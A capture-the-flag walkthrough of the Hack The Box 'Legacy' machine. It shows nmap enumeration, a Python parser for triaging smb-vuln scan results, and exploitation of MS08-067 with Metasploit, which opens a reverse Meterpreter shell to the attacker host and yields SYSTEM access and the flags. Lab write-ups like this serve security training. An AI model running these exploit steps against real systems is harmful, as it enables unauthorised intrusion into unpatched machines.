[HTB] Legacy

Today we are going to hack the HTB machine called Legacy. It is rated as easy.
  • Enumeration
    sml@m0nikE:~/ctf/htb/machines/legacy$ sudo nmap -A -p- -sS 10.10.10.4
    Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-24 16:59 CET
    Nmap scan report for 10.10.10.4
    Host is up (0.038s latency).
    Not shown: 65532 filtered ports
    PORT     STATE  SERVICE       VERSION
    139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
    445/tcp  open   microsoft-ds  Windows XP microsoft-ds
    3389/tcp closed ms-wbt-server
    Device type: general purpose|specialized
    Running (JUST GUESSING): Microsoft Windows XP|2003|2000|2008 (94%), General Dynamics embedded (87%)
    OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_server_2008::sp2
    Aggressive OS guesses: Microsoft Windows XP SP3 (94%), Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows XP (92%), Microsoft Windows Server 2003 SP2 (92%), Microsoft Windows XP SP2 or Windows Server 2003 (91%), Microsoft Windows 2003 SP2 (90%), Microsoft Windows XP SP2 or SP3 (90%), Microsoft Windows 2000 SP4 or Windows XP SP2 or SP3 (90%), Microsoft Windows XP SP2 (89%), Microsoft Windows Server 2003 (89%)
    No exact OS matches for host (test conditions non-ideal).
    Network Distance: 2 hops
    Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

    Host script results:
    |_clock-skew: mean: 5d00h57m34s, deviation: 1h24m50s, median: 4d23h57m34s
    |_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:5d:9b (VMware)
    | smb-os-discovery:
    |   OS: Windows XP (Windows 2000 LAN Manager)
    |   OS CPE: cpe:/o:microsoft:windows_xp::-
    |   Computer name: legacy
    |   NetBIOS computer name: LEGACY\x00
    |   Workgroup: HTB\x00
    |_  System time: 2019-11-29T19:58:39+02:00
    | smb-security-mode:
    |   account_used: <blank>
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: disabled (dangerous, but default)
    |_smb2-time: Protocol negotiation failed (SMB2)

    TRACEROUTE (using port 3389/tcp)
    HOP RTT      ADDRESS
    1   38.38 ms 10.10.14.1
    2   38.46 ms 10.10.10.4

    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 168.95 seconds
    We can see that port 445 is open, so let's check whether it has any known vulnerability using nmap's smb-vuln* scripts.
    sml@m0nikE:~$ sudo nmap -sS --script smb-vuln* -p445 10.10.10.4
    Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-24 17:02 CET
    Nmap scan report for 10.10.10.4
    Host is up (0.038s latency).

    PORT    STATE SERVICE
    445/tcp open  microsoft-ds

    Host script results:
    | smb-vuln-ms08-067:
    |   VULNERABLE:
    |   Microsoft Windows system vulnerable to remote code execution (MS08-067)
    |     State: VULNERABLE
    |     IDs:  CVE:CVE-2008-4250
    |           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
    |           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
    |           code via a crafted RPC request that triggers the overflow during path canonicalization.
    |
    |     Disclosure date: 2008-10-23
    |     References:
    |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
    |_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
    |_smb-vuln-ms10-054: false
    |_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
    | smb-vuln-ms17-010:
    |   VULNERABLE:
    |   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
    |     State: VULNERABLE
    |     IDs:  CVE:CVE-2017-0143
    |     Risk factor: HIGH
    |       A critical remote code execution vulnerability exists in Microsoft SMBv1
    |        servers (ms17-010).
    |
    |     Disclosure date: 2017-03-14
    |     References:
    |       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
    |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
    |_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

    Nmap done: 1 IP address (1 host up) scanned in 5.73 seconds
    We can see that it has vulnerabilities... For this box we are going to use MS08-067.
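Before moving on, a way to turn that scan output into something a patch-management process can act on. The Python below is an added example, not code from the writeup: it parses the host-script block that nmap prints in its normal output, records the state, CVE identifiers and risk factor for each smb-vuln script, and keeps a script error (such as the smb-vuln-ms10-061 failure above) separate from a "not vulnerable" verdict so it gets re-run instead of being counted as clean. The sample input is a constructed re-wrapping of the scan above into nmap's usual line layout; the function and field names are my own.

```python
"""Triage of `nmap --script smb-vuln*` output: an added example, not code from the writeup."""
import re
from dataclasses import dataclass, field

CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")

# Constructed sample: the host-script block from the scan above, in nmap's normal line layout.
SAMPLE_NMAP_OUTPUT = """\
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           Allows remote attackers to execute arbitrary code via a crafted RPC request.
|
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Nmap done: 1 IP address (1 host up) scanned in 5.73 seconds
"""


@dataclass
class ScriptResult:
    name: str
    state: str = "UNKNOWN"       # VULNERABLE / LIKELY_VULNERABLE / NOT_VULNERABLE / ERROR / UNKNOWN
    cves: list = field(default_factory=list)
    risk: str = ""
    detail: str = ""             # first descriptive line of the result, handy in a report


def _state_from_header(value: str) -> str:
    """Single-line results are decided by the value on the script's own line."""
    if value.startswith("ERROR"):
        return "ERROR"           # the check did not run: this is not evidence of a patched host
    if value.lower() == "false":
        return "NOT_VULNERABLE"  # what smb-vuln-* prints for a host that passed the check
    return "UNKNOWN"             # multi-line result: the 'State:' line decides below


def parse_smb_vuln_output(text: str) -> dict:
    """Return {script name: ScriptResult} for every host-script block in nmap's normal output."""
    results, current = {}, None
    for raw in text.splitlines():
        if not raw.startswith("|"):
            continue                                            # outside the script block
        body = raw[2:] if raw.startswith("|_") else raw[1:]     # '|_' marks a block's last line
        stripped = body.strip()
        if not stripped:
            continue
        indent = len(body) - len(body.lstrip(" "))
        if indent <= 1:                          # '| id: ...' or '|_id: ...' opens a new block
            name, _, value = stripped.partition(":")
            current = ScriptResult(name.strip(), _state_from_header(value.strip()))
            results[current.name] = current
            continue
        if current is None:
            continue
        if stripped.startswith("State:"):
            state = stripped.split(":", 1)[1].strip().upper()
            if state.startswith("NOT"):
                current.state = "NOT_VULNERABLE"
            elif state.startswith("LIKELY"):
                current.state = "LIKELY_VULNERABLE"
            elif state.startswith("VULNERABLE"):
                current.state = "VULNERABLE"
        elif stripped.startswith("Risk factor:"):
            current.risk = stripped.split(":", 1)[1].strip()
        elif not current.detail and stripped not in ("VULNERABLE:", "NOT VULNERABLE:"):
            current.detail = stripped
        for cve in CVE_RE.findall(stripped):     # from the IDs line and reference URLs, deduplicated
            if cve not in current.cves:
                current.cves.append(cve)
    return results


def vulnerable_scripts(results: dict) -> list:
    """Scripts that positively flagged the host; each one maps to a missing update."""
    return sorted(n for n, r in results.items() if r.state in ("VULNERABLE", "LIKELY_VULNERABLE"))


def errored_scripts(results: dict) -> list:
    """Scripts that failed to run; re-scan these rather than counting the host as clean."""
    return sorted(n for n, r in results.items() if r.state == "ERROR")


if __name__ == "__main__":
    findings = parse_smb_vuln_output(SAMPLE_NMAP_OUTPUT)
    for name in vulnerable_scripts(findings):
        r = findings[name]
        print(f"{name}: {r.state} risk={r.risk or 'n/a'} {','.join(r.cves)} -- {r.detail}")
    for name in errored_scripts(findings):
        print(f"{name}: check did not complete, rerun with -d")
```

Run it as a script, or feed it a file saved with nmap's -oN option. For the scan above both smb-vuln-ms08-067 and smb-vuln-ms17-010 come back as VULNERABLE, which from the defender's side means the host is missing the updates the script references point to, and smb-vuln-ms10-061 is reported as an error rather than silently dropped.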
  • Exploitation
    msf5 > search ms08-067

    Matching Modules
    ================

       #  Name                                 Disclosure Date  Rank   Check  Description
       -  ----                                 ---------------  ----   -----  -----------
       0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption

    msf5 > use exploit/windows/smb/ms08_067_netapi
    msf5 exploit(windows/smb/ms08_067_netapi) > show options

    Module options (exploit/windows/smb/ms08_067_netapi):

       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT    445              yes       The SMB service port (TCP)
       SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

    msf5 exploit(windows/smb/ms08_067_netapi) > set rhosts 10.10.10.4
    rhosts => 10.10.10.4
    msf5 exploit(windows/smb/ms08_067_netapi) > exploit

    [*] Started reverse TCP handler on 10.10.14.13:4444
    [*] 10.10.10.4:445 - Automatically detecting the target...
    [*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
    [*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
    [*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
    [*] Sending stage (180291 bytes) to 10.10.10.4
    [*] Meterpreter session 1 opened (10.10.14.13:4444 -> 10.10.10.4:1031) at 2019-11-24 17:03:37 +0100
    It worked, so we now have an open session. Let's check our privileges on the machine.
    meterpreter > getuid Server username: NT AUTHORITY\SYSTEM
    We are SYSTEM, so we already have a privileged user. Time to get the flags.
  • user.txt
    C:\>cd documents and settings
    cd documents and settings

    C:\Documents and Settings>dir
    dir
     Volume in drive C has no label.
     Volume Serial Number is 54BF-723B

     Directory of C:\Documents and Settings

    29/11/2019  08:02    <DIR>          .
    29/11/2019  08:02    <DIR>          ..
    29/11/2019  08:02                 0 10.10.10.4
    16/03/2017  08:07    <DIR>          Administrator
    16/03/2017  07:29    <DIR>          All Users
    29/11/2019  08:02                 0 exploit
    16/03/2017  07:33    <DIR>          john
    29/11/2019  08:01                 0 search
    29/11/2019  08:02                 0 set
    29/11/2019  08:01                 0 show
    29/11/2019  08:01                 0 use
                   6 File(s)              0 bytes
                   5 Dir(s)   6.313.308.160 bytes free

    C:\Documents and Settings>cd john
    cd john

    C:\Documents and Settings\john>cd Desktop
    cd Desktop

    C:\Documents and Settings\john\Desktop>dir
    dir
     Volume in drive C has no label.
     Volume Serial Number is 54BF-723B

     Directory of C:\Documents and Settings\john\Desktop

    16/03/2017  08:19    <DIR>          .
    16/03/2017  08:19    <DIR>          ..
    16/03/2017  08:19                32 user.txt
                   1 File(s)             32 bytes
                   2 Dir(s)   6.313.304.064 bytes free

    C:\Documents and Settings\john\Desktop>type user.txt
    e69af0e4f443de7e36876fda4ec76XXX
  • root.txt
    C:\Documents and Settings>cd Administrator
    cd Administrator

    C:\Documents and Settings\Administrator>dir
    dir
     Volume in drive C has no label.
     Volume Serial Number is 54BF-723B

     Directory of C:\Documents and Settings\Administrator

    16/03/2017  08:07    <DIR>          .
    16/03/2017  08:07    <DIR>          ..
    16/03/2017  08:18    <DIR>          Desktop
    16/03/2017  08:07    <DIR>          Favorites
    16/03/2017  08:07    <DIR>          My Documents
    16/03/2017  07:20    <DIR>          Start Menu
                   0 File(s)              0 bytes
                   6 Dir(s)   6.313.295.872 bytes free

    C:\Documents and Settings\Administrator>cd Desktop
    cd Desktop

    C:\Documents and Settings\Administrator\Desktop>type root.txt
    993442d258b0e0ec917cae9e695d5XXX
  • End
    And with that we have both the "user" flag and the "root" flag.